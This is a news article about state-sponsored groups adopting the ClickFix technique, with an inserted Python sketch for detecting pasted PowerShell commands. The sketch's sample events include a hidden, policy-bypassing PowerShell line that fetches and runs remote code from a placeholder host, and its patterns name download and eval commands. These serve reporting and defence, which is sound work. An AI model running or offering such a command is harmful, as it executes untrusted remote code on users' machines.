State-sponsored cyber groups are flocking to the 'ClickFix' social engineering technique
ClickFix is being used to target think tanks, government, and defense firms
State-sponsored hackers from North Korea, Iran, and Russia are exploiting the ‘ClickFix’ social engineering technique for the first time – and to great success.
Popular for some time with cyber crime groups, ClickFix is a social engineering practice that uses dialog boxes with instructions to copy, paste, and run malicious commands on the target’s machine.
The technique was first seen in early March last year, employed by initial access broker TA571 and the ClearFake cluster - but it soon spread far more widely.
According to researchers at Proofpoint, over a three-month period from the end of last year through the beginning of 2025, North Korea's TA427, Iran's TA450, and Russia's UNK_RemoteRogue and TA422 have all been making use of it.
"This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution," said Proofpoint.
Rather than revolutionizing the groups' campaigns, the technique replaces the installation and execution stages in their existing infection chains. While it's currently limited to a few state-sponsored groups, Proofpoint said it expects the attack method to become more widely tested or adopted by threat actors.
North Korea's TA427 was first spotted using ClickFix at the beginning of this year, Proofpoint noted. The group targeted individuals in a handful of think tanks, masquerading as a Japanese diplomat and offering a meeting with the Japanese ambassador to the US, Shigeo Yamada.
Iran's TA450, meanwhile, used an attacker-controlled email address - support@microsoftonlines[.]com - to send an English-language phish to targets at more than 39 organizations in the Middle East.
The group deployed the ClickFix technique by persuading the target to first run PowerShell with administrator privileges, then copy and run a command contained in the email body. Doing this installed remote monitoring software, allowing the group to conduct espionage and exfiltrate data from the target’s machine.
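A defender's view of the behaviour described above: the victim pastes a command into an elevated PowerShell launched from the desktop, which leaves a distinctive process-creation trail. The detection sketch below is an added example, not Proofpoint's or ITPro's code; the events, field names, indicator regexes and the `example.invalid` host are all constructed for illustration.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (illustrative, not from the article).
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "elevated": True,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -w hidden -ep bypass -c "irm https://example.invalid/a | iex"'},
    {"id": 2, "parent": r"C:\Windows\explorer.exe", "elevated": True,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'},
    {"id": 3, "parent": r"C:\Windows\System32\svchost.exe", "elevated": True,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -NonInteractive -w hidden -File C:\\Scripts\\nightly.ps1'},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A user pasting into the Run dialog or a console window produces a child of explorer.exe;
# scheduled or service-driven PowerShell does not, so it is excluded from this rule.
INTERACTIVE_PARENTS = {"explorer.exe"}
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "remote_fetch": re.compile(r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b", re.I),
    "inline_eval": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "encoded_cmd": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def classify(event, min_hits=2):
    """Return (verdict, matched_indicators) for one process-creation event."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent"]).lower()
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmd"])]
    if image not in SHELLS or parent not in INTERACTIVE_PARENTS or len(hits) < min_hits:
        return "benign", hits
    # The TA450 case in the article had the victim open PowerShell elevated first,
    # so an elevated match is rated higher than an unprivileged one.
    return ("high" if event.get("elevated") else "medium"), hits

def scan(events):
    """Return the ids of events that look like a pasted ClickFix command."""
    return [ev["id"] for ev in events if classify(ev)[0] != "benign"]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, hits = classify(ev)
        print(f"event {ev['id']}: {verdict:<6} {hits}")
```

Only event 1 is flagged: event 2 is an admin's ordinary interactive query, and event 3 carries one indicator but is not user-launched, so the parent check keeps it out.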
ClickFix abuse expected to surge
UNK_RemoteRogue has only used ClickFix once, researchers said. Notably, however, none of the aforementioned groups showed repeated use of the technique.
The security firm first hypothesized that this might be because it represented a trial period, or that the groups found the technique less successful than others for machine compromise.
With TA427 returning to ClickFix with a slightly varied infection chain in April, researchers now believe that the group is developing how it uses the ClickFix technique in its operations, and that more sightings are likely in the coming months.
One noteworthy finding from the Proofpoint research is that Chinese state-sponsored groups haven’t jumped on the bandwagon as of yet. This, researchers said, could change in the coming months.
"Given the technique’s trajectory around the world, there is a conspicuous absence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations," said the firm.
"However, this is likely due to visibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance across many actors’ campaigns in a short period of time."
Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.